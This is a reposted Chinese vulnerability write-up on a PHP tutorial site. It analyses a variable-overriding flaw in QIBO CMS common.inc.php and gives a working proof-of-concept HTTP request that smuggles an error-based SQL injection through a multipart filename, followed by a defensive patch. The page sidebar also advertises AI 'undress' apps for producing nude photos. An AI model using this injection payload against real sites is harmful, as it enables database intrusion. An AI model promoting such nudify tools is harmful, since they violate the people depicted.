Home php教程 php手册 QIBO CMS /inc/common.inc.php Local Variables Overriding Vul

QIBO CMS /inc/common.inc.php Local Variables Overriding Vul

Jun 06, 2016 pm 07:48 PM
cms

目录 1 . 漏洞描述 2 . 漏洞触发条件 3 . 漏洞影响范围 4 . 漏洞代码分析 5 . 防御方法 6 . 攻防思考 1. 漏洞描述 齐博在/inc/common.inc.php使用$$_key=$value、extract等逻辑实现了外部输入变量的本地注册,这是模拟了GPC的功能,但同时也引入 " 本地变量

目录

<span>1</span><span>. 漏洞描述
</span><span>2</span><span>. 漏洞触发条件
</span><span>3</span><span>. 漏洞影响范围
</span><span>4</span><span>. 漏洞代码分析
</span><span>5</span><span>. 防御方法
</span><span>6</span>. 攻防思考
Copy after login

 

1. 漏洞描述

齐博在/inc/common.inc.php使用$$_key=$value、extract等逻辑实现了外部输入变量的本地注册,这是模拟了GPC的功能,但同时也引入<span>"</span><span>本地变量覆盖</span><span>"</span>、<span>"</span><span>本地变量未初始化</span><span>"</span><span>的安全风险
齐博CMS中的漏洞文件</span>/inc/common.inc.php使用 @extract($_FILES, EXTR_SKIP)来注册$_FILES的各变量,使用EXTR_SKIP来控制不覆盖已存在的变量。利用一个末初始化的变量覆盖漏洞,即可导致sql注入漏洞
Copy after login

Relevant Link:

http:<span>//</span><span>bbs.qibosoft.com/read-forum-tid-422299.htm</span>
Copy after login


2. 漏洞触发条件

0x1: 攻击入口

构造$_FILE的变量覆盖构造覆盖$cidDB变量,POST给/member/comment.php

<span>1</span>. 首先访问/member下面的<span>"</span><span>评论管理</span><span>"</span><span>功能,抓包

</span><span>2</span><span>. 在http request中构造一个attachment,如下:
</span><span>/*</span><span>
POST /qibo/member/comment.php?job=yz&yz=0 HTTP/1.1  
Host: 127.0.0.1  
Proxy-Connection: keep-alive  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,</span><span>*/</span>*;q=<span>0.8</span><span>  
User</span>-Agent: Mozilla/<span>5.0</span> (Windows NT <span>6.1</span>; WOW64) AppleWebKit/<span>537.36</span> (KHTML, like Gecko) Chrome/<span>28.0</span>.<span>1500.95</span> Safari/<span>537.36</span> SE <span>2</span>.X MetaSr <span>1.0</span><span>  
Referer: http:</span><span>//</span><span>127.0.0.1/qibo/member/comment.php?job=work  </span>
Accept-<span>Encoding: gzip,deflate,sdch  
Accept</span>-Language: zh-CN,zh;q=<span>0.8</span><span>  
Cookie: PHPSESSID</span>=<span>jo9rpav7l51iakidv01vr9fem1;   
passport</span>=<span>1</span>%09admin%09ClAKVgsEBglUAwcFUgRTDgRRCF9XUAZXBAcAVQIHBlc%3D94606de1fd; USR=fvqnvbj3%<span>0922</span>%<span>091425969668</span>%09http%3A%2F%2F127.<span>0.0</span>.<span>1</span>%2Fqibo%2Fmember%2Fcomment.php%3Fjob%<span>3Dwork  
Content</span>-Type: multipart/form-<span>data;   
boundary</span>=----<span>WebKitFormBoundary6ukpBHoIrpHKtOkl  
Content</span>-Length: <span>227</span>  
   
------<span>WebKitFormBoundary6ukpBHoIrpHKtOkl  
Content</span>-Disposition: form-data; name=<span>"</span><span>cidDB</span><span>"</span>; filename=<span>"</span><span>1' and EXP(~(select * from(select user())a)) -- </span><span>"</span><span>  
Content</span>-Type: text/<span>plain  
   
</span><span>1111</span>  
------WebKitFormBoundary6ukpBHoIrpHKtOkl--
*/<span>
注意将原来的URL上的cidDB[]</span>=<span>x删除掉;
然后构造一个文件上传的报文(GET改为POST方法)
在filename处填入注入的payload

</span><span>3</span><span>. 提交该数据包,即可注入成功
</span><span>//</span><span>这次的变量覆盖是抓住了extract的EXTR_SKIP只检查已经存在的变量,但是有些没有声明的变量还是会被覆盖</span>
Copy after login

Relevant Link:

http:<span>//</span><span>bobao.360.cn/learning/detail/291.html</span>
Copy after login


3. 漏洞影响范围

齐博所有系统、所有版本


4. 漏洞代码分析

\qibo\inc\common.inc.php

<span>/*</span><span>
全局变量文件对GPC变量的过滤
从代码中可以看淡,通过$_FILE传的值,POST的内容受GPC影响,因此只能利用$_FILE变量的$key绕过add_S函数
这里,$_FILS在传递参数时,是数组形式,因此可以默认使用$_FILES的$key去覆盖
</span><span>*/</span><span>
$_POST</span>=<span>Add_S($_POST);
$_GET</span>=<span>Add_S($_GET);
$_COOKIE</span>=<span>Add_S($_COOKIE);

function Add_S($array)
{
    </span><span>foreach</span>($array <span>as</span> $key=><span>$value)
    {
        </span><span>if</span>(!<span>is_array($value))
        {
            $value</span>=str_replace(<span>"</span><span></span><span>"</span>,<span>"</span><span>& # x</span><span>"</span>,$value);    <span>//</span><span>过滤一些不安全字符</span>
            $value=preg_replace(<span>"</span><span>/eval/i</span><span>"</span>,<span>"</span><span>eva l</span><span>"</span>,$value);    <span>//</span><span>过滤不安全函数</span>
            !get_magic_quotes_gpc() && $value=<span>addslashes($value);
            $array[$key]</span>=<span>$value;
        }
        </span><span>else</span><span>
        {
            $array[$key]</span>=<span>Add_S($array[$key]); 
        }
    }
    </span><span>return</span><span> $array;
}

</span><span>if</span>(!ini_get(<span>'</span><span>register_globals</span><span>'</span><span>))
{
    @extract($_FILES,EXTR_SKIP);
}

</span><span>foreach</span>($_COOKIE AS $_key=><span>$_value)
{
    unset($$_key);
}
</span><span>foreach</span>($_POST AS $_key=><span>$_value)
{
    </span>!ereg(<span>"</span><span>^\_[A-Z]+</span><span>"</span>,$_key) && $$_key=<span>$_POST[$_key];
}
</span><span>foreach</span>($_GET AS $_key=><span>$_value)
{
    </span>!ereg(<span>"</span><span>^\_[A-Z]+</span><span>"</span>,$_key) && $$_key=<span>$_GET[$_key];
}</span>
Copy after login


5. 防御方法

\qibo\inc\common.inc.php

<span>if</span>(!ini_get(<span>'</span><span>register_globals</span><span>'</span><span>))
{
    $array </span>= array(<span>'</span><span>Filedata</span><span>'</span>,<span>'</span><span>postfile</span><span>'</span>,<span>'</span><span>upfile</span><span>'</span>,<span>'</span><span>fileData</span><span>'</span>,<span>'</span><span>Filedata</span><span>'</span><span>);
    </span><span>foreach</span>($array AS $key=><span>$value)
    {
        is_array($_FILES[$value]) </span>&& $$value =<span> $_FILES[$value];
    }
}</span>
Copy after login


6. 攻防思考

Copyright (c) 2014 LittleHann All rights reserved

 

Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

AI Hentai Generator

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)
2 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
Repo: How To Revive Teammates
1 months ago By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island Adventure: How To Get Giant Seeds
4 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Hot Tools

Notepad++7.3.1

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)

PHP framework and CMS integration: unlimited possibilities for technology integration PHP framework and CMS integration: unlimited possibilities for technology integration Jun 01, 2024 pm 05:16 PM

The benefits brought by the integration of PHP framework and CMS are: 1. Improve development efficiency; 2. Enhance security; 3. Simplify content management; 4. Flexibility. In a practical case, the Laravel framework was integrated with WordPressCMS to create a blog website with customized functions. The integration steps include creating a Laravel application, installing WordPress, configuring WordPress, creating a controller, defining routing, obtaining WordPress data, and in the Laravel view Display Data.

How to use PHP CMS system for financial website development How to use PHP CMS system for financial website development Aug 25, 2023 am 10:06 AM

With the popularity and development of the Internet, financial websites have become more and more important. Financial websites play a decisive role in the financial industry's business development, marketing and brand building, etc. Nowadays, with the popularity and maturity of CMS systems, more and more companies are beginning to choose to use CMS systems for website development. This article will focus on how to use the PHPCMS system in developing financial websites. 1. Understand the CMS system. CMS system is the abbreviation of content management system. It refers to a system that can quickly create

How to use Java to write the data synchronization module of the CMS system How to use Java to write the data synchronization module of the CMS system Aug 08, 2023 pm 11:49 PM

How to use Java to write the data synchronization module of a CMS system Introduction: With the development of the information age and the popularity of the Internet, content management systems (CMS) have been widely used in all walks of life. Among different user groups, content management requires the synchronization of multiple data sources, which requires an efficient and reliable data synchronization module. This article will introduce how to use Java to write the data synchronization module of the CMS system and provide relevant code examples. 1. Overview Data synchronization refers to the transfer of data between multiple data sources.

Imperial CMS directory location revealed Imperial CMS directory location revealed Mar 12, 2024 pm 10:33 PM

The location of the Empire CMS directory is revealed. Specific code examples are needed. Empire CMS (EmpireCMS) is a widely used open source content management system. Its flexibility and feature richness are loved by users. During the website development process, it is crucial to understand the directory structure and file location of Empire CMS, as this helps developers better manage website content and functions. This article will reveal the directory location of Empire CMS and provide specific code examples to help readers gain a deeper understanding of this content management system. 1.Basic directory structure

PHPcms column cache storage path revealed PHPcms column cache storage path revealed Mar 14, 2024 pm 03:18 PM

PHPcms is a powerful content management system that is widely used in website development. Column caching is an important function in PHPcms, which can improve website access speed and reduce server pressure. This article will reveal the storage path of the PHPcms column cache and provide specific code examples. 1. What is column caching? Column caching refers to generating static files from the column content in the website and storing them in the specified path. When the user accesses the column, the static file is directly read instead of dynamically generating the page every time. this

Build a PHP cloud transcoding CMS system to implement video transcoding services Build a PHP cloud transcoding CMS system to implement video transcoding services Mar 16, 2024 am 08:30 AM

Build a PHP cloud transcoding CMS system to implement video transcoding services. With the rapid development of online videos, video transcoding services have become more and more important. In order to meet users' needs for video transcoding, building a PHP cloud transcoding CMS system is a good choice. In this article, we will introduce how to build a simple PHP cloud transcoding CMS system and provide specific code examples. First, we need to prepare a basic PHP development environment. Make sure you have PHP and MySQL installed and have a web server such as Apa

How to use Java to implement the image watermark function of CMS system How to use Java to implement the image watermark function of CMS system Aug 27, 2023 am 11:27 AM

How to use Java to implement the picture watermark function of the CMS system Summary: Adding the picture watermark function to the CMS system can effectively prevent pictures from being tampered with and stolen. This article will introduce how to use Java to implement the image watermark function of the CMS system and provide code examples. Introduction With the popularity of the Internet and the popularity of digital cameras, the theft and tampering of pictures has become a common problem. In order to protect the copyright of images, many CMS systems will add image watermark functions. Image watermarking is a technology that adds some identifiable information to images, such as

Impact and response to when PHPcms will stop maintenance Impact and response to when PHPcms will stop maintenance Mar 14, 2024 am 11:12 AM

The impact and response of when PHPcms will stop maintenance. With the continuous development of Internet technology, website construction has become an essential tool for many companies and individuals. In website construction, the content management system (CMS) plays an important role. As a commonly used CMS tool, PHPcms was once very popular. However, as time goes by, the update and maintenance of the PHPcms version gradually decreases or even stops maintenance, which brings a series of impacts to users and developers. This article will explore the impact of PHPcms out of maintenance and provide a

See all articles